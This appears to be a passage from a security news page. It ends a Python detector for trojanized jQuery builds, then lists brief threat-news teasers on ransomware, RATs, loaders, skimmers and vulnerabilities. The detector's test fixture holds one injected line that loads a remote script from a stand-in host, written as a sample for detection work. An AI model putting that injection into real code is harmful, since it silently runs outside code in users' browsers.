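        i += 1
    if depth:
        return None
    return source[m.end():i - 1].strip()


def normalize(js):
    """Strip all whitespace and a trailing semicolon so minified and
    pretty-printed forms of the same statement compare equal."""
    return re.sub(r"\s+", "", js).rstrip(";")


def check_end_function(source):
    body = extract_function_body(source, "end")
    if body is None:
        return {"status": "missing", "body": None}
    if normalize(body) == normalize(EXPECTED_END_BODY):
        return {"status": "clean", "body": body}
    return {"status": "modified", "body": body}


# Constructed jQuery-like fragments, not the contents of any real package.
CLEAN = """
jQuery.fn.extend( {
  end: function() {
    return this.prevObject || this.constructor();
  },
} );
"""

MINIFIED = "jQuery.fn.extend({end:function(){return this.prevObject||this.constructor()},eq:function(i){return this.pushStack(i)}});"

TROJANIZED = """
jQuery.fn.extend( {
  end: function() {
    if ( !window.__x ) { window.__x = 1; var s = document.createElement( "script" ); s.src = "https://cdn.invalid/p.js"; document.head.appendChild( s ); }
    return this.prevObject || this.constructor();
  },
} );
"""

if __name__ == "__main__":
    for label, src in (("clean", CLEAN), ("minified", MINIFIED), ("trojanized", TROJANIZED)):
        print(label, check_end_function(src)["status"])
```

Pointed at `node_modules/jquery/dist/jquery.js` (or the minified build) after an install, the same check catches the specific modification the researchers describe; a `modified` verdict should be confirmed by diffing the file against the tagged release from the upstream repository rather than trusted on its own.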

‘Eldorado’ Ransomware Targets Windows and Linux Systems

A new ransomware-as-a-service (RaaS) operation named Eldorado has emerged, targeting both Windows and Linux systems with locker variants. Eldorado was first announced on March 16, 2024, in an advertisement for its affiliate program on the ransomware forum RAMP. The firm, having infiltrated the ransomware group, identified the representative as a Russian speaker and confirmed that …

Hackers Exploit CrowdStrike Glitch to Distribute Remcos RAT

CrowdStrike, a leading cybersecurity firm, is facing backlash after a recent flawed update caused widespread IT disruptions. This update error has now led to cybercriminals exploiting the situation by distributing Remcos RAT malware under the guise of a hotfix. The attack unfolds through a ZIP archive named “crowdstrike-hotfix.zip,” which contains a malware loader known as …

APT40 Quickly Adapts to New Cyber Threats

Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. have issued a joint advisory about the China-linked cyber espionage group APT40, highlighting its ability to rapidly adopt new exploits for security vulnerabilities shortly after they are publicly disclosed. “APT40 has previously targeted organizations in various countries, including Australia …

Mekotio Banking Trojan Targets Financial Institutions

Financial institutions in Latin America are facing threats from the Mekotio banking trojan, also known as Melcoz. Researchers report a recent surge in cyberattacks distributing this Windows malware. Mekotio, active since 2015, targets countries such as Brazil, Chile, Mexico, Spain, Peru, and Portugal, aiming to steal banking credentials. First documented in August 2020, Mekotio is …

GootLoader Malware Continues to Evolve with New Threats

The GootLoader malware is still actively used by cybercriminals to deliver various malicious payloads to compromised systems. “Recent updates have led to several versions of GootLoader, with GootLoader 3 currently being the most active,” a cybersecurity firm stated in an analysis published last week. “Although the specifics of the GootLoader payloads have evolved, the infection methods …

Hackers Attack Global Infrastructure with Ransomware

Suspected hackers from China and North Korea have been linked to ransomware and data encryption attacks targeting government and critical infrastructure worldwide from 2021 to 2023. Two distinct groups are involved in these activities. One is associated with ChamelGang (aka CamoFei), while the other overlaps with Chinese and North Korean state-sponsored groups. ChamelGang’s attacks include …

Security Risks Found in Common Industrial Gas Analyzers

Researchers have identified several security vulnerabilities in Emerson Rosemount gas chromatographs that could be exploited by malicious actors to access sensitive information, cause denial-of-service (DoS) conditions, and execute arbitrary commands. These vulnerabilities affect the GC370XA, GC700XA, and GC1500XA models, specifically versions 4.1.5 and earlier. Researchers highlighted that the vulnerabilities include two command injection flaws and …

Android Users at Risk from Spyware Hidden in Popular Apps

The hacker group Transparent Tribe continues its campaign of distributing malware-laden Android apps through social engineering tactics, aiming to infiltrate the devices of targeted individuals. According to a new report, these APKs represent the group’s ongoing strategy of embedding spyware into video browsing applications. Recently, they’ve expanded their focus to include mobile gamers, weapons enthusiasts, …

Rust-Based P2PInfect Botnet Adds Mining and Ransomware

The peer-to-peer botnet known as P2PInfect has started targeting misconfigured Redis servers with ransomware and cryptocurrency miners. This evolution shows the botnet’s shift from a dormant state with unclear motives to a financially driven operation. “With the latest updates to its crypto miner, ransomware payload, and rootkit elements, the malware author continues to profit from …

Intel CPUs Vulnerable to ‘Indirector’ Side-Channel Attack

Modern Intel CPUs, including Raptor Lake and Alder Lake, have been found to be susceptible to a new side-channel attack, dubbed Indirector, which could be exploited to leak sensitive data. The attack, discovered by researchers, exploits weaknesses in the Indirect Branch Predictor (IBP) and the Branch Target Buffer (BTB), bypassing current defenses and compromising CPU …

FakeBat Malware Spreads Through Drive-by Downloads

The loader-as-a-service (LaaS) known as FakeBat has become one of the most prevalent loader malware families this year, spread primarily through drive-by download attacks. “FakeBat is mainly designed to download and execute subsequent payloads like IcedID, Lumma, RedLine, SmokeLoader, SectopRAT, and Ursnif,” the company stated in a recent analysis. Drive-by download attacks involve tactics such …

New Credit Card Skimmer Targets Popular CMS Platforms

A new credit card skimmer named Caesar Cipher Skimmer has been found targeting major content management systems (CMS) like WordPress, Magento, and OpenCart. A web skimmer is a type of malware injected into e-commerce sites to steal financial and payment data. According to the report, this latest campaign involves maliciously altering the checkout PHP file …

Linux RansomHub Ransomware Hits VMware ESXi VMs

The RansomHub ransomware operation, active since February 2024, is now utilizing a Linux-based encryptor specifically designed to attack VMware ESXi environments in corporate settings. This ransomware-as-a-service (RaaS) operation has connections with ALPHV/BlackCat and Knight ransomware and has affected over 45 victims in 18 countries. The discovery of both Windows and Linux encryptors for RansomHub was …

New SnailLoad Attack Reveals Users’ Web Activities

A team of security researchers has unveiled a novel side-channel attack technique called SnailLoad, which can remotely deduce a user’s web activity. “SnailLoad leverages a universal bottleneck in internet connections,” the researchers explained in their recent study. This bottleneck affects network packet latency, allowing attackers to infer ongoing network activity on another person’s internet connection. …

Polyfill Supply Chain Attack Impacts Over 110,000 Websites

Google has blocked ads for e-commerce sites using the Polyfill.io service after a Chinese company acquired the domain and altered the JavaScript library (“polyfill.js”) to redirect users to malicious sites. According to the report, this supply chain attack affects over 110,000 websites that utilize the library. Polyfill is a widely-used library that adds modern functionality …

Kimsuky Uses Chrome Extension to Steal Data

The North Korean hacking group known as Kimsuky is employing a new malicious Google Chrome extension named TRANSLATEXT to steal sensitive information as part of its ongoing intelligence operations. Researchers discovered this activity in early March 2024, noting that the extension collects email addresses, usernames, passwords, cookies, and browser screenshots. This targeted campaign focuses on …

Hackers Exploit WordPress Plugins to Create Rogue Admins

Multiple WordPress plugins have been compromised to inject malicious code, enabling the creation of rogue administrator accounts that can perform arbitrary actions. According to the report, the injected malware creates a new administrative user account and sends those details back to an attacker-controlled server. Additionally, malicious JavaScript is injected into the website’s footer to add …

Oyster Backdoor Spread via Fake Software Downloads

A malvertising campaign is exploiting trojanized installers of popular software like Google Chrome and Microsoft Teams to deploy a backdoor known as Oyster (also referred to as Broomstick or CleanUpLoader). The researchers discovered that cybercriminals are creating lookalike websites hosting these malicious payloads. Users are redirected to these sites after searching for the software on …

NiceRAT Malware Infects Devices via Cracked Software

Cybercriminals have been deploying malware named NiceRAT to infect devices and incorporate them into a botnet, specifically targeting users in South Korea. The malware is spread under the guise of cracked software, such as pirated versions of Microsoft Windows or tools claiming to offer license verification for Microsoft Office. According to the report, the …

Fog Ransomware Hits Education Sector via Breached VPNs

In early May 2024, a new ransomware operation named ‘Fog’ began targeting educational organizations in the U.S. by exploiting compromised VPN credentials. The operation has yet to set up an extortion portal and was initially not observed stealing data. However, the gang does steal data to use in double-extortion attacks, coercing victims into paying ransoms. The …

PhantomLoader Used to Spread SSLoad Malware

Cybercriminals are using a newly discovered loader called PhantomLoader to distribute the nascent malware SSLoad, according to the report. Researchers reported that PhantomLoader is integrated into legitimate DLLs, often EDR or AV products, through binary patching and self-modifying techniques to evade detection. SSLoad, likely marketed under a Malware-as-a-Service (MaaS) model due to its various delivery …

Compromised Sites Spreading BadSpace Windows Backdoor

Hackers are leveraging legitimate-but-compromised websites to deploy a Windows backdoor called BadSpace, disguising it as fake browser updates. According to the report, the attackers use a multi-stage approach involving an infected website, a command-and-control (C2) server, a fake browser update, and a JScript downloader to install the backdoor on the victim’s system. The details of …

Scattered Spider Hackers Target Cloud Apps for Data Theft

The Scattered Spider gang, also known as Octo Tempest, 0ktapus, Scatter Swine, and UNC3944, has shifted its focus to stealing data from software-as-a-service (SaaS) applications and creating new virtual machines to establish persistence in their attacks. Traditionally known for social engineering tactics such as SMS phishing, SIM swapping, and account hijacking to gain on-premise access, …

Linux Malware Uses Emojis on Discord for Control

A recently identified Linux malware, named ‘DISGOMOJI,’ employs an innovative method of using emojis to execute commands on compromised systems, specifically targeting government agencies in India. Cybersecurity firm Volexity uncovered the malware, attributing it to a Pakistan-based threat actor referred to as ‘UTA0137.’ Volexity’s analysis in 2024 revealed a cyber-espionage campaign by UTA0137, which is believed …

Cybercriminals Use Free Software Lures to Deploy Malware Loader

Cybercriminals are enticing users with free or pirated versions of commercial software to install a malware loader known as Hijack Loader, which subsequently deploys the Vidar Stealer information stealer. Researchers revealed that adversaries tricked users into downloading password-protected archive files containing trojanized copies of the Cisco Webex Meetings App (ptService.exe). When victims extracted and executed …

Fake Chrome Errors Install Malware via PowerShell Scripts

A recent malware campaign employs deceptive error messages from Google Chrome, Word, and OneDrive to trick users into executing malicious PowerShell scripts that install malware. This campaign has been linked to various threat actors, including ClearFake, a new attack cluster called ClickFix, and TA571, known for large-scale email spam leading to malware and ransomware infections. …

CISA Alert: Windows Vulnerability Exploited in Ransomware Attacks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has flagged a significant Windows vulnerability, identified as CVE-2024-26169, that is being actively exploited in ransomware attacks. This flaw, now classified as a zero-day, involves improper privilege management in the Windows Error Reporting service, allowing local attackers to gain SYSTEM permissions through straightforward, low-complexity attacks that do …

DarkGate Malware Adopts AutoHotkey in New Cyber Attacks

In recent cyber attacks, the DarkGate malware-as-a-service (MaaS) operation has transitioned from using AutoIt scripts to an AutoHotkey mechanism for its final payload delivery. This change highlights the ongoing efforts of threat actors to evade detection. Version 6 of DarkGate, released in March 2024 by developer RastaFarEye, showcases this update. RastaFarEye has been offering DarkGate …

Massive Cyber Attack Cripples Over 600,000 Routers in the U.S.

A mysterious cyber attack has left over 600,000 small office/home office (SOHO) routers offline, disrupting internet access for many users in the U.S. The attack, which occurred between October 25 and 27, 2023, targeted a single internet service provider (ISP). The affected routers include the ActionTec T3200, ActionTec T3260, and Sagemcom models issued by the …

Critical PHP Flaw Allows Remote Code Execution on Servers

A significant security flaw has been discovered in PHP, posing a risk of remote code execution on Windows servers. The vulnerability, identified as CVE-2024-4577, affects all PHP versions on Windows and is categorized as a CGI argument injection flaw. According to the security researcher, this issue enables attackers to bypass protections established for a previous …

Advanced LightSpy Spyware Variant Targets macOS

Cybersecurity experts have discovered an advanced macOS variant of the LightSpy spyware, previously known for targeting iOS users. Research teams uncovered this previously undocumented variant, revealing that the LightSpy framework is capable of infecting multiple platforms, including Android, iOS, Windows, macOS, Linux, and various routers. The attackers utilized publicly available exploits (CVE-2018-4233 and CVE-2018-4404) to …

FBI Releases 7,000 LockBit Ransomware Decryption Keys to Aid Victims

The FBI has revealed that it possesses over 7,000 decryption keys for the LockBit ransomware, enabling victims to recover their data for free. LockBit, a notorious ransomware group, has been linked to more than 2,400 global attacks, with at least 1,800 affecting U.S. entities. In February, the U.K. National Crime Agency (NCA) led an international …

New ‘Warmcookie’ Windows Backdoor Spreads via Fake Job Offers

A new Windows malware named ‘Warmcookie’ is being distributed through fake job offer phishing campaigns, targeting corporate networks. Researchers discovered this threat, noting its capabilities for extensive machine fingerprinting, screenshot capturing, and deploying additional payloads. The ongoing campaign sees threat actors creating new domains weekly to support their operations, using compromised infrastructure to send phishing …

CatDDoS Botnet and DNSBomb DDoS Attack Technique Alert

Researchers have issued a warning about the CatDDoS malware botnet, which has exploited over 80 known security vulnerabilities in various software over the past three months to infiltrate devices and use them in distributed denial-of-service (DDoS) attacks. CatDDoS-related samples have leveraged numerous known vulnerabilities. The number of daily targets has exceeded 300. The vulnerabilities affect …
